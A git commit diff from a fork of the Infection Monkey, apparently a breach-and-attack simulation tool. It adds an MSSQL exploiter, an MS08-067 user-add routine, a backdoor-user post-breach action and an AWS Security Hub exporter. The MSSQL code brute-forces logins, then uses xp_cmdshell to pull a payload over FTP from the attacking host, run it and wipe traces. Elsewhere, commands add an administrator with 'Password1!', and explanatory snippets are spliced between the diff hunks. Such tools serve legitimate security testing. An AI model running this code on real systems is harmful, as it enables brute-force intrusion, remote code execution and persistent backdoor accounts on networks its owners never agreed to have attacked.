forked from p15670423/monkey
Merge branch 'develop' into feature/scan_with_ping
commit 53228e8cea
@@ -41,6 +41,8 @@ Setup
-------------------------------
Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or the quick [getting started guide](https://www.guardicore.com/infectionmonkey/wt/).

The Infection Monkey supports a variety of platforms, documented [in the wiki](https://github.com/guardicore/monkey/wiki/OS-compatibility).


Building the Monkey from source
-------------------------------
@@ -1,3 +1,4 @@
import re
import urllib2

__author__ = 'itay.mizeretz'

@@ -7,11 +8,28 @@ class AWS(object):
    def __init__(self):
        try:
            self.instance_id = urllib2.urlopen('http://169.254.169.254/latest/meta-data/instance-id', timeout=2).read()
            self.region = self._parse_region(
                urllib2.urlopen('http://169.254.169.254/latest/meta-data/placement/availability-zone').read())
        except urllib2.URLError:
            self.instance_id = None
            self.region = None

    @staticmethod
    def _parse_region(region_url_response):
        # For a list of regions: https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html
        # This regex will find any AWS region format string in the response.
        re_phrase = r'((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])'
        finding = re.findall(re_phrase, region_url_response, re.IGNORECASE)
        if finding:
            return finding[0]
        else:
            return None

    def get_instance_id(self):
        return self.instance_id

    def get_region(self):
        return self.region

    def is_aws_instance(self):
        return self.instance_id is not None
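For context, a minimal sketch of how this metadata helper might be used by a caller; the telemetry dictionary shape here is illustrative, not taken from the diff:

```python
from common.cloud.aws import AWS

aws_info = AWS()
if aws_info.is_aws_instance():
    # Hypothetical caller: attach the instance details to outgoing telemetry.
    telemetry = {'aws': {'instance_id': aws_info.get_instance_id(),
                         'region': aws_info.get_region()}}
```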
@@ -7,8 +7,6 @@ from abc import ABCMeta
from itertools import product
import importlib

importlib.import_module('infection_monkey', 'network')

__author__ = 'itamar'

GUID = str(uuid.getnode())

@@ -22,6 +20,7 @@ class Configuration(object):
        # now we won't work at <2.7 for sure
        network_import = importlib.import_module('infection_monkey.network')
        exploit_import = importlib.import_module('infection_monkey.exploit')
        post_breach_import = importlib.import_module('infection_monkey.post_breach')

        unknown_items = []
        for key, value in formatted_data.items():

@@ -41,6 +40,9 @@ class Configuration(object):
            elif key == 'exploiter_classes':
                class_objects = [getattr(exploit_import, val) for val in value]
                setattr(self, key, class_objects)
            elif key == 'post_breach_actions':
                class_objects = [getattr(post_breach_import, val) for val in value]
                setattr(self, key, class_objects)
            else:
                if hasattr(self, key):
                    setattr(self, key, value)

@@ -192,7 +194,7 @@ class Configuration(object):
                        9200]
    tcp_target_ports.extend(HTTP_PORTS)
    tcp_scan_timeout = 3000  # 3000 Milliseconds
    tcp_scan_interval = 200
    tcp_scan_interval = 0
    tcp_scan_get_banner = True

    # Ping Scanner

@@ -205,8 +207,8 @@ class Configuration(object):
    skip_exploit_if_file_exist = False

    ms08_067_exploit_attempts = 5
    ms08_067_remote_user_add = "Monkey_IUSER_SUPPORT"
    ms08_067_remote_user_pass = "Password1!"
    user_to_add = "Monkey_IUSER_SUPPORT"
    remote_user_pass = "Password1!"

    # rdp exploiter
    rdp_use_vbs_download = True

@@ -267,5 +269,7 @@ class Configuration(object):

    extract_azure_creds = True

    post_breach_actions = []


WormConfiguration = Configuration()
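To make the name-to-class resolution in the hunk above concrete, here is a minimal sketch; the module path and class name come from elsewhere in this diff, while the standalone harness around them is illustrative:

```python
import importlib

# 'post_breach_actions': ['BackdoorUser'] in the JSON config is turned into real class objects.
post_breach_import = importlib.import_module('infection_monkey.post_breach')
class_objects = [getattr(post_breach_import, name) for name in ['BackdoorUser']]
# The classes are instantiated later, e.g.: action = class_objects[0](); action.act()
```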
@@ -41,7 +41,8 @@
    "SambaCryExploiter",
    "Struts2Exploiter",
    "WebLogicExploiter",
    "HadoopExploiter"
    "HadoopExploiter",
    "MSSQLExploiter"
  ],
  "finger_classes": [
    "SSHFinger",

@@ -57,8 +58,8 @@
  "monkey_log_path_linux": "/tmp/user-1563",
  "send_log_to_server": true,
  "ms08_067_exploit_attempts": 5,
  "ms08_067_remote_user_add": "Monkey_IUSER_SUPPORT",
  "ms08_067_remote_user_pass": "Password1!",
  "user_to_add": "Monkey_IUSER_SUPPORT",
  "remote_user_pass": "Password1!",
  "ping_scan_timeout": 10000,
  "rdp_use_vbs_download": true,
  "smb_download_timeout": 300,

@@ -78,7 +79,7 @@
  "sambacry_shares_not_to_check": ["IPC$", "print$"],
  "local_network_scan": false,
  "tcp_scan_get_banner": true,
  "tcp_scan_interval": 200,
  "tcp_scan_interval": 0,
  "tcp_scan_timeout": 10000,
  "tcp_target_ports": [
    22,

@@ -96,5 +97,6 @@
  "timeout_between_iterations": 10,
  "use_file_logging": true,
  "victims_max_exploit": 7,
  "victims_max_find": 30
  "victims_max_find": 30,
  "post_breach_actions": []
}
@@ -45,3 +45,4 @@ from infection_monkey.exploit.elasticgroovy import ElasticGroovyExploiter
from infection_monkey.exploit.struts2 import Struts2Exploiter
from infection_monkey.exploit.weblogic import WebLogicExploiter
from infection_monkey.exploit.hadoop import HadoopExploiter
from infection_monkey.exploit.mssqlexec import MSSQLExploiter
@@ -8,7 +8,7 @@ import json
import logging
import requests
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP
from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX
from infection_monkey.network.elasticfinger import ES_PORT, ES_SERVICE

import re

@@ -34,7 +34,7 @@ class ElasticGroovyExploiter(WebRCE):
        exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
        exploit_config['dropper'] = True
        exploit_config['url_extensions'] = ['_search?pretty']
        exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': RDP_CMDLINE_HTTP}
        exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX + " " + RDP_CMDLINE_HTTP}
        return exploit_config

    def get_open_service_ports(self, port_list, names):

@@ -63,3 +63,20 @@ class ElasticGroovyExploiter(WebRCE):
            return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
        except (KeyError, IndexError):
            return None

    def check_if_exploitable(self, url):
        # Overrides the web_rce method in order to add the CMD prefix for Windows commands
        try:
            if 'windows' in self.host.os['type']:
                resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND)
            else:
                resp = self.exploit(url, CHECK_COMMAND)
            if resp is True:
                return True
            elif resp is not False and ID_STRING in resp:
                return True
            else:
                return False
        except Exception as e:
            LOG.error("Host's exploitability check failed due to: %s" % e)
            return False
@@ -0,0 +1,128 @@
import os
import platform
from os import path
import logging

import pymssql

from infection_monkey.exploit import HostExploiter, mssqlexec_utils

__author__ = 'Maor Rayzin'

LOG = logging.getLogger(__name__)


class MSSQLExploiter(HostExploiter):

    _TARGET_OS_TYPE = ['windows']
    LOGIN_TIMEOUT = 15
    SQL_DEFAULT_TCP_PORT = '1433'
    DEFAULT_PAYLOAD_PATH = os.path.expandvars(r'%TEMP%\~PLD123.bat') if platform.system() else '/tmp/~PLD123.bat'

    def __init__(self, host):
        super(MSSQLExploiter, self).__init__(host)
        self._config = __import__('config').WormConfiguration
        self.attacks_list = [mssqlexec_utils.CmdShellAttack]

    def create_payload_file(self, payload_path=DEFAULT_PAYLOAD_PATH):
        """
        Dynamically creates the payload file that will be transported to, and run on, the exploited machine.
        :param payload_path: The path to create the payload file in
        :return: True if the payload file was created, False otherwise.
        """
        try:
            with open(payload_path, 'w+') as payload_file:
                payload_file.write('dir C:\\')
            return True
        except Exception as e:
            LOG.error("Payload file couldn't be created", exc_info=True)
            return False

    def exploit_host(self):
        """
        Main function of the MSSQL brute force.
        Return:
            True or False, depending on the success of the process.
        """
        username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()

        if not self.create_payload_file():
            return False
        if self.brute_force_begin(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list,
                                  self.DEFAULT_PAYLOAD_PATH):
            LOG.debug("Brute force was a success on host: {0}".format(self.host.ip_addr))
            return True
        else:
            LOG.error("Brute force process failed on host: {0}".format(self.host.ip_addr))
            return False

    def handle_payload(self, cursor, payload):
        """
        Handles the process of sending and executing the payload; prepares the attack and its details.

        Args:
            cursor (pymssql cursor): A cursor from a connected pymssql.connect object, used to run commands.
            payload (string): Payload path

        Return:
            True or False, depending on the success of the process.
        """
        chosen_attack = self.attacks_list[0](payload, cursor, self.host.ip_addr)

        if chosen_attack.send_payload():
            LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
            if chosen_attack.execute_payload():
                LOG.debug('Payload: {0} has been successfully executed on host'.format(payload))
                chosen_attack.cleanup_files()
                return True
            else:
                LOG.error("Payload: {0} couldn't be executed".format(payload))
        else:
            LOG.error("Payload: {0} couldn't be sent to host".format(payload))

        chosen_attack.cleanup_files()
        return False

    def brute_force_begin(self, host, port, users_passwords_pairs_list, payload):
        """
        Starts the brute force connection attempts and, if needed, initiates the payload process.
        The main loop starts here.

        Args:
            host (str): Host IP address
            port (str): TCP port that the host listens on
            payload (str): Local path to the payload
            users_passwords_pairs_list (list): A list of user/password pairs to brute force with

        Return:
            True or False, depending on whether the whole brute force and attack process completed successfully.
        """
        # Main loop: iterate over the user/password pairs
        for user, password in users_passwords_pairs_list:
            try:
                # Core step: try to connect
                conn = pymssql.connect(host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT)
                LOG.info('Successfully connected to host: {0}, '
                         'using user: {1}, password: {2}'.format(host, user, password))
                self.report_login_attempt(True, user, password)
                cursor = conn.cursor()

                # Handles the payload and returns True or False
                if self.handle_payload(cursor, payload):
                    LOG.debug("Successfully sent and executed payload: {0} on host: {1}".format(payload, host))
                    return True
                else:
                    LOG.warning("User: {0} and password: {1} "
                                "were able to connect to host: {2} but couldn't handle payload: {3}"
                                .format(user, password, host, payload))
            except pymssql.OperationalError:
                # This combination didn't work, moving on to the next one
                pass

        LOG.warning('No user/password combination was able to connect to host: {0}:{1}, '
                    'aborting brute force'.format(host, port))
        return False
@@ -0,0 +1,214 @@
import os
import multiprocessing
import logging

import pymssql

from infection_monkey.exploit.tools import get_interface_to_target
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer


__author__ = 'Maor Rayzin'


FTP_SERVER_PORT = 1026
FTP_SERVER_ADDRESS = ''
FTP_SERVER_USER = 'brute'
FTP_SERVER_PASSWORD = 'force'
FTP_WORKING_DIR = '.'

LOG = logging.getLogger(__name__)


class FTP(object):

    """Configures and establishes an FTP server with default details.

    Args:
        user (str): User for FTP server auth
        password (str): Password for FTP server auth
        working_dir (str): The local working dir to init the FTP server on.

    """

    def __init__(self, user=FTP_SERVER_USER, password=FTP_SERVER_PASSWORD,
                 working_dir=FTP_WORKING_DIR):
        """Look at the class-level docstring."""

        self.user = user
        self.password = password
        self.working_dir = working_dir

    def run_server(self, user=FTP_SERVER_USER, password=FTP_SERVER_PASSWORD,
                   working_dir=FTP_WORKING_DIR):

        """Configures and runs the FTP server to listen forever until stopped.

        Args:
            user (str): User for FTP server auth
            password (str): Password for FTP server auth
            working_dir (str): The local working dir to init the FTP server on.
        """

        # Define an authorizer and configure the FTP user
        authorizer = DummyAuthorizer()
        authorizer.add_user(user, password, working_dir, perm='elradfmw')

        # Normal FTP handler
        handler = FTPHandler
        handler.authorizer = authorizer

        address = (FTP_SERVER_ADDRESS, FTP_SERVER_PORT)

        # Configure the server using the address and handler. Kept on self because stop_server uses it as well.
        self.server = FTPServer(address, handler)

        # Start the FTP server. It has no auto-stop or stop clause, and it blocks while in use,
        # which is why multiprocessing is used here.
        self.server.serve_forever()

    def stop_server(self):
        # Stops the FTP server and closes all connections.
        self.server.close_all()


class AttackHost(object):
    """
    This class acts as an interface for the attack-method classes.

    Args:
        payload_path (str): The local path of the payload file
    """

    def __init__(self, payload_path):
        self.payload_path = payload_path

    def send_payload(self):
        raise NotImplementedError("Send function not implemented")

    def execute_payload(self):
        raise NotImplementedError("Execute function not implemented")


class CmdShellAttack(AttackHost):

    """
    This class uses xp_cmdshell for command execution and will work only if it is available on the remote host.

    Args:
        payload_path (str): The local path of the payload file
        cursor (pymssql cursor): A cursor object from pymssql.connect, used to run commands.

    """

    def __init__(self, payload_path, cursor, dst_ip_address):
        super(CmdShellAttack, self).__init__(payload_path)
        self.ftp_server, self.ftp_server_p = self.__init_ftp_server()
        self.cursor = cursor
        self.attacker_ip = get_interface_to_target(dst_ip_address)

    def send_payload(self):
        """
        Sets up an FTP server and uses it to download the payload to the remote host.

        Return:
            True if the payload was sent, False if not.
        """

        # Set up the commands to run
        shellcmd1 = """xp_cmdshell "mkdir c:\\tmp& chdir c:\\tmp& echo open {0} {1}>ftp.txt& \
        echo {2}>>ftp.txt" """.format(self.attacker_ip, FTP_SERVER_PORT, FTP_SERVER_USER)
        shellcmd2 = """xp_cmdshell "chdir c:\\tmp& echo {0}>>ftp.txt" """.format(FTP_SERVER_PASSWORD)
        shellcmd3 = """xp_cmdshell "chdir c:\\tmp& echo get {0}>>ftp.txt& echo bye>>ftp.txt" """\
            .format(self.payload_path)
        shellcmd4 = """xp_cmdshell "chdir c:\\tmp& cmd /c ftp -s:ftp.txt" """
        shellcmds = [shellcmd1, shellcmd2, shellcmd3, shellcmd4]

        # Check that the FTP server is up
        if self.ftp_server_p and self.ftp_server:
            try:
                # Run the commands on the remote host
                for cmd in shellcmds:
                    self.cursor.execute(cmd)
            except Exception as e:
                LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
                self.ftp_server_p.terminate()
                return False
            return True
        else:
            LOG.error("Couldn't establish an FTP server for the payload drop")
            return False

    def execute_payload(self):

        """
        Executes the payload after the FTP drop.

        Return:
            True if the payload was executed successfully, False if not.
        """

        # Get the payload's file name
        payload_file_name = os.path.split(self.payload_path)[1]

        # Prepare the command to run remotely, using no_output so the exit code can be captured: 0 -> success, 1 -> error.
        shellcmd = """DECLARE @i INT \
        EXEC @i=xp_cmdshell "chdir C:\\& C:\\tmp\\{0}", no_output \
        SELECT @i """.format(payload_file_name)

        try:
            # Execute the payload on the remote host
            LOG.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name))
            self.cursor.execute(shellcmd)
            if self.cursor.fetchall()[0][0] == 0:
                # Success
                self.ftp_server_p.terminate()
                LOG.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name))
                return True
            else:
                LOG.warning('Payload: {0} execution on remote host failed'.format(payload_file_name))
                self.ftp_server_p.terminate()
                return False

        except pymssql.OperationalError:
            LOG.error('Executing payload: {0} failed'.format(payload_file_name), exc_info=True)
            self.ftp_server_p.terminate()
            return False

    def cleanup_files(self):
        """
        Cleans up the folder with the attack-related files (C:\\tmp by default).
        :return: True or False, depending on whether the command executed.
        """
        cleanup_command = """xp_cmdshell "rd /s /q c:\\tmp" """
        try:
            self.cursor.execute(cleanup_command)
            LOG.info('Attack files cleanup command has been sent.')
            return True
        except Exception as e:
            LOG.error('Error cleaning the attack files using xp_cmdshell, files may remain on host', exc_info=True)
            return False

    def __init_ftp_server(self):
        """
        Initializes an FTP server, using the FTP class, in a separate process.

        Return:
            ftp_s: FTP server object
            p: the process object running the FTP object
        """

        try:
            ftp_s = FTP()
            multiprocessing.log_to_stderr(logging.DEBUG)
            p = multiprocessing.Process(target=ftp_s.run_server)
            p.start()
            LOG.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
            return ftp_s, p
        except Exception as e:
            LOG.error('Exception raised while trying to bring up the FTP server', exc_info=True)
            return None, None
@@ -192,9 +192,9 @@ class Ms08_067_Exploiter(HostExploiter):

            sock.send("cmd /c (net user %s %s /add) &&"
                      " (net localgroup administrators %s /add)\r\n" %
                      (self._config.ms08_067_remote_user_add,
                       self._config.ms08_067_remote_user_pass,
                       self._config.ms08_067_remote_user_add))
                      (self._config.user_to_add,
                       self._config.remote_user_pass,
                       self._config.user_to_add))
            time.sleep(2)
            reply = sock.recv(1000)

@@ -213,8 +213,8 @@ class Ms08_067_Exploiter(HostExploiter):
            remote_full_path = SmbTools.copy_file(self.host,
                                                  src_path,
                                                  self._config.dropper_target_path_win_32,
                                                  self._config.ms08_067_remote_user_add,
                                                  self._config.ms08_067_remote_user_pass)
                                                  self._config.user_to_add,
                                                  self._config.remote_user_pass)

            if not remote_full_path:
                # try other passwords for administrator

@@ -240,7 +240,7 @@ class Ms08_067_Exploiter(HostExploiter):

        try:
            sock.send("start %s\r\n" % (cmdline,))
            sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add,))
            sock.send("net user %s /delete\r\n" % (self._config.user_to_add,))
        except Exception as exc:
            LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
            return False
@@ -24,6 +24,8 @@ CHMOD_MONKEY = "chmod +x %(monkey_path)s"
RUN_MONKEY = " %(monkey_path)s %(monkey_type)s %(parameters)s"
# Command used to check the architecture and whether the machine is exploitable
CHECK_COMMAND = "echo %s" % ID_STRING
# CMD prefix for Windows commands
CMD_PREFIX = "cmd.exe /c"
# Architecture checking commands
GET_ARCH_WINDOWS = "wmic os get osarchitecture"
GET_ARCH_LINUX = "lscpu"
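To make the composition concrete: assuming ID_STRING is a unique marker string defined alongside these constants (the value below is illustrative), the Windows check command used by ElasticGroovyExploiter above expands roughly like this:

```python
ID_STRING = "M0NK3Y"                        # illustrative value; the real marker lives in the model package
CHECK_COMMAND = "echo %s" % ID_STRING       # -> "echo M0NK3Y"
CMD_PREFIX = "cmd.exe /c"

windows_check = CMD_PREFIX + " " + CHECK_COMMAND   # -> "cmd.exe /c echo M0NK3Y"
# If the target's response echoes ID_STRING back, the host is considered exploitable.
```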
@@ -109,6 +109,10 @@ class InfectionMonkey(object):
            system_info = system_info_collector.get_info()
            ControlClient.send_telemetry("system_info_collection", system_info)

        for action_class in WormConfiguration.post_breach_actions:
            action = action_class()
            action.act()

        if 0 == WormConfiguration.depth:
            LOG.debug("Reached max depth, shutting down")
            ControlClient.send_telemetry("trace", "Reached max depth, shutting down")
@@ -107,8 +107,8 @@ class NetworkScanner(object):

                        break

            if SCAN_DELAY:
                time.sleep(SCAN_DELAY)
            if WormConfiguration.tcp_scan_interval:
                time.sleep(WormConfiguration.tcp_scan_interval)

    @staticmethod
    def _is_any_ip_in_subnet(ip_addresses, subnet_str):
@@ -0,0 +1,4 @@
__author__ = 'danielg'


from add_user import BackdoorUser
@@ -0,0 +1,49 @@
import datetime
import logging
import subprocess
import sys
from infection_monkey.config import WormConfiguration

LOG = logging.getLogger(__name__)

# Linux doesn't have WindowsError
try:
    WindowsError
except NameError:
    WindowsError = None

__author__ = 'danielg'


class BackdoorUser(object):
    """
    This module adds a disabled user to the system.
    This tests part of the ATT&CK matrix.
    """

    def act(self):
        LOG.info("Adding a user")
        if sys.platform.startswith("win"):
            retval = self.add_user_windows()
        else:
            retval = self.add_user_linux()
        if retval != 0:
            LOG.warn("Failed to add a user")
        else:
            LOG.info("Done adding user")

    @staticmethod
    def add_user_linux():
        cmd_line = ['useradd', '-M', '--expiredate',
                    datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER',
                    WormConfiguration.user_to_add]
        retval = subprocess.call(cmd_line)
        return retval

    @staticmethod
    def add_user_windows():
        cmd_line = ['net', 'user', WormConfiguration.user_to_add,
                    WormConfiguration.remote_user_pass,
                    '/add', '/ACTIVE:NO']
        retval = subprocess.call(cmd_line)
        return retval
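For clarity, a minimal sketch of the command line the Linux branch above ends up invoking, using the default user name from the config elsewhere in this diff (the date is computed at runtime and the standalone harness is illustrative):

```python
import datetime
import subprocess

# Mirrors add_user_linux(): a user with no home dir that expires today and is immediately inactive.
cmd_line = ['useradd', '-M', '--expiredate',
            datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0',
            '-c', 'MONKEY_USER', 'Monkey_IUSER_SUPPORT']
print(' '.join(cmd_line))
# subprocess.call(cmd_line) returns 0 on success, matching the retval check in act().
```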
@@ -15,3 +15,6 @@ ecdsa
netifaces
ipaddress
wmi
pywin32
pymssql
pyftpdlib
@@ -36,7 +36,7 @@ class WindowsInfoCollector(InfoCollector):
        """
        LOG.debug("Running Windows collector")
        super(WindowsInfoCollector, self).get_info()
        self.get_wmi_info()
        # self.get_wmi_info()
        self.get_installed_packages()
        from infection_monkey.config import WormConfiguration
        if WormConfiguration.should_use_mimikatz:
@@ -18,6 +18,7 @@ from cc.resources.log import Log
from cc.resources.island_logs import IslandLog
from cc.resources.monkey import Monkey
from cc.resources.monkey_configuration import MonkeyConfiguration
from cc.resources.island_configuration import IslandConfiguration
from cc.resources.monkey_download import MonkeyDownload
from cc.resources.netmap import NetMap
from cc.resources.node import Node

@@ -104,6 +105,7 @@ def init_app(mongo_url):
    api.add_resource(ClientRun, '/api/client-monkey', '/api/client-monkey/')
    api.add_resource(Telemetry, '/api/telemetry', '/api/telemetry/', '/api/telemetry/<string:monkey_guid>')
    api.add_resource(MonkeyConfiguration, '/api/configuration', '/api/configuration/')
    api.add_resource(IslandConfiguration, '/api/configuration/island', '/api/configuration/island/')
    api.add_resource(MonkeyDownload, '/api/monkey/download', '/api/monkey/download/',
                     '/api/monkey/download/<string:path>')
    api.add_resource(NetMap, '/api/netmap', '/api/netmap/')
@@ -8,11 +8,15 @@ __author__ = 'itay.mizeretz'
class AwsEnvironment(Environment):
    def __init__(self):
        super(AwsEnvironment, self).__init__()
        self._instance_id = AwsEnvironment._get_instance_id()
        self.aws_info = AWS()
        self._instance_id = self._get_instance_id()
        self.region = self._get_region()

    @staticmethod
    def _get_instance_id():
        return AWS.get_instance_id()
    def _get_instance_id(self):
        return self.aws_info.get_instance_id()

    def _get_region(self):
        return self.aws_info.get_region()

    def is_auth_enabled(self):
        return True
@@ -5,6 +5,8 @@ import aws

logger = logging.getLogger(__name__)

AWS = 'aws'
STANDARD = 'standard'

ENV_DICT = {
    'standard': standard.StandardEnvironment,

@@ -12,13 +14,16 @@ ENV_DICT = {
}


def load_env_from_file():
def load_server_configuration_from_file():
    with open('monkey_island/cc/server_config.json', 'r') as f:
        config_content = f.read()
    config_json = json.loads(config_content)
    return config_json['server_config']
    return json.loads(config_content)


def load_env_from_file():
    config_json = load_server_configuration_from_file()
    return config_json['server_config']


try:
    __env_type = load_env_from_file()
    env = ENV_DICT[__env_type]()
@@ -0,0 +1,19 @@
from cc.environment.environment import load_env_from_file, AWS
from cc.report_exporter_manager import ReportExporterManager
from cc.resources.aws_exporter import AWSExporter

__author__ = 'maor.rayzin'


def populate_exporter_list():

    manager = ReportExporterManager()
    if is_aws_exporter_required():
        manager.add_exporter_to_list(AWSExporter)


def is_aws_exporter_required():
    if str(load_env_from_file()) == AWS:
        return True
    else:
        return False
@@ -18,6 +18,7 @@ json_setup_logging(default_path=os.path.join(BASE_PATH, 'cc', 'island_logger_def
logger = logging.getLogger(__name__)

from cc.app import init_app
from cc.exporter_init import populate_exporter_list
from cc.utils import local_ip_addresses
from cc.environment.environment import env
from cc.database import is_db_server_up

@@ -34,6 +35,7 @@ def main():
        logger.info('Waiting for MongoDB server')
        time.sleep(1)

    populate_exporter_list()
    app = init_app(mongo_url)
    if env.is_debug():
        app.run(host='0.0.0.0', debug=True, ssl_context=('monkey_island/cc/server.crt', 'monkey_island/cc/server.key'))

@@ -44,6 +46,7 @@ def main():
    http_server.listen(env.get_island_port())
    logger.info(
        'Monkey Island Server is running on https://{}:{}'.format(local_ip_addresses()[0], env.get_island_port()))

    IOLoop.instance().start()
@@ -0,0 +1,34 @@
import logging

__author__ = 'maor.rayzin'

logger = logging.getLogger(__name__)


class Singleton(type):
    _instances = {}

    def __call__(cls, *args, **kwargs):
        if cls not in cls._instances:
            cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
        return cls._instances[cls]


class ReportExporterManager(object):
    __metaclass__ = Singleton

    def __init__(self):
        self._exporters_set = set()

    def get_exporters_list(self):
        return self._exporters_set

    def add_exporter_to_list(self, exporter):
        self._exporters_set.add(exporter)

    def export(self, report):
        try:
            for exporter in self._exporters_set:
                exporter().handle_report(report)
        except Exception as e:
            logger.exception('Failed to export report')
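A quick sketch of what the Singleton metaclass buys the manager: every `ReportExporterManager()` call returns the same instance, so exporters registered at startup are still there when the report is exported later. This relies on Python 2 `__metaclass__` semantics, matching the rest of the diff; the exporter class below is illustrative, not part of the commit:

```python
class PrintExporter(object):  # illustrative stand-in for a real Exporter subclass
    @staticmethod
    def handle_report(report_json):
        print('exporting report')

ReportExporterManager().add_exporter_to_list(PrintExporter)
assert ReportExporterManager() is ReportExporterManager()   # same singleton instance
ReportExporterManager().export({'dummy': 'report'})          # calls PrintExporter().handle_report(...)
```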
@@ -0,0 +1,411 @@
import logging
import uuid
from datetime import datetime
import boto3
from botocore.exceptions import UnknownServiceError

from cc.resources.exporter import Exporter
from cc.services.config import ConfigService
from cc.environment.environment import load_server_configuration_from_file
from common.cloud.aws import AWS

__author__ = 'maor.rayzin'


logger = logging.getLogger(__name__)

AWS_CRED_CONFIG_KEYS = [['cnc', 'aws_config', 'aws_access_key_id'],
                        ['cnc', 'aws_config', 'aws_secret_access_key'],
                        ['cnc', 'aws_config', 'aws_account_id']]


class AWSExporter(Exporter):

    @staticmethod
    def handle_report(report_json):
        aws = AWS()
        findings_list = []
        issues_list = report_json['recommendations']['issues']
        if not issues_list:
            logger.info('No issues were found by the monkey, no need to send anything')
            return True
        for machine in issues_list:
            for issue in issues_list[machine]:
                if issue.get('aws_instance_id', None):
                    findings_list.append(AWSExporter._prepare_finding(issue, aws.get_region()))

        if not AWSExporter._send_findings(findings_list, AWSExporter._get_aws_keys(), aws.get_region()):
            logger.error('Exporting findings to AWS failed')
            return False

        return True

    @staticmethod
    def _get_aws_keys():
        creds_dict = {}
        for key in AWS_CRED_CONFIG_KEYS:
            creds_dict[key[2]] = str(ConfigService.get_config_value(key))

        return creds_dict

    @staticmethod
    def merge_two_dicts(x, y):
        z = x.copy()  # start with x's keys and values
        z.update(y)   # modifies z with y's keys and values & returns None
        return z

    @staticmethod
    def _prepare_finding(issue, region):
        findings_dict = {
            'island_cross_segment': AWSExporter._handle_island_cross_segment_issue,
            'ssh': AWSExporter._handle_ssh_issue,
            'shellshock': AWSExporter._handle_shellshock_issue,
            'tunnel': AWSExporter._handle_tunnel_issue,
            'elastic': AWSExporter._handle_elastic_issue,
            'smb_password': AWSExporter._handle_smb_password_issue,
            'smb_pth': AWSExporter._handle_smb_pth_issue,
            'sambacry': AWSExporter._handle_sambacry_issue,
            'shared_passwords': AWSExporter._handle_shared_passwords_issue,
            'wmi_password': AWSExporter._handle_wmi_password_issue,
            'wmi_pth': AWSExporter._handle_wmi_pth_issue,
            'ssh_key': AWSExporter._handle_ssh_key_issue,
            'rdp': AWSExporter._handle_rdp_issue,
            'shared_passwords_domain': AWSExporter._handle_shared_passwords_domain_issue,
            'shared_admins_domain': AWSExporter._handle_shared_admins_domain_issue,
            'strong_users_on_crit': AWSExporter._handle_strong_users_on_crit_issue,
            'struts2': AWSExporter._handle_struts2_issue,
            'weblogic': AWSExporter._handle_weblogic_issue,
            'hadoop': AWSExporter._handle_hadoop_issue,
            # azure and conficker are not relevant issues for an AWS env
        }

        configured_product_arn = load_server_configuration_from_file()['aws'].get('sec_hub_product_arn', '')
        product_arn = 'arn:aws:securityhub:{region}:{arn}'.format(region=region, arn=configured_product_arn)
        instance_arn = 'arn:aws:ec2:' + str(region) + ':instance:{instance_id}'
        account_id = AWSExporter._get_aws_keys().get('aws_account_id', '')

        finding = {
            "SchemaVersion": "2018-10-08",
            "Id": uuid.uuid4().hex,
            "ProductArn": product_arn,
            "GeneratorId": issue['type'],
            "AwsAccountId": account_id,
            "RecordState": "ACTIVE",
            "Types": [
                "Software and Configuration Checks/Vulnerabilities/CVE"
            ],
            "CreatedAt": datetime.now().isoformat() + 'Z',
            "UpdatedAt": datetime.now().isoformat() + 'Z',
        }
        return AWSExporter.merge_two_dicts(finding, findings_dict[issue['type']](issue, instance_arn))

    @staticmethod
    def _send_findings(findings_list, creds_dict, region):
        try:
            if not creds_dict:
                logger.info('No AWS access credentials received in configuration')
                return False

            securityhub = boto3.client('securityhub',
                                       aws_access_key_id=creds_dict.get('aws_access_key_id', ''),
                                       aws_secret_access_key=creds_dict.get('aws_secret_access_key', ''),
                                       region_name=region)

            import_response = securityhub.batch_import_findings(Findings=findings_list)
            if import_response['ResponseMetadata']['HTTPStatusCode'] == 200:
                return True
            else:
                return False
        except UnknownServiceError as e:
            logger.warning('AWS exporter called but the AWS securityhub service is not available in the installed SDK')
            return False
        except Exception as e:
            logger.exception('AWS Security Hub findings failed to send.')
            return False

    @staticmethod
    def _get_finding_resource(instance_id, instance_arn):
        if instance_id:
            return [{
                "Type": "AwsEc2Instance",
                "Id": instance_arn.format(instance_id=instance_id)
            }]
        else:
            return [{'Type': 'Other', 'Id': 'None'}]

    @staticmethod
    def _build_generic_finding(severity, title, description, recommendation, instance_arn, instance_id=None):
        finding = {
            "Severity": {
                "Product": severity,
                "Normalized": 100
            },
            'Resources': AWSExporter._get_finding_resource(instance_id, instance_arn),
            "Title": title,
            "Description": description,
            "Remediation": {
                "Recommendation": {
                    "Text": recommendation
                }
            }}

        return finding

    @staticmethod
    def _handle_tunnel_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=5,
            title="Weak segmentation - Machines were able to communicate over unused ports.",
            description="Use micro-segmentation policies to disable communication other than the required.",
            recommendation="Machines are not locked down at port level. Network tunnel was set up from {0} to {1}".format(
                issue['machine'], issue['dest']),
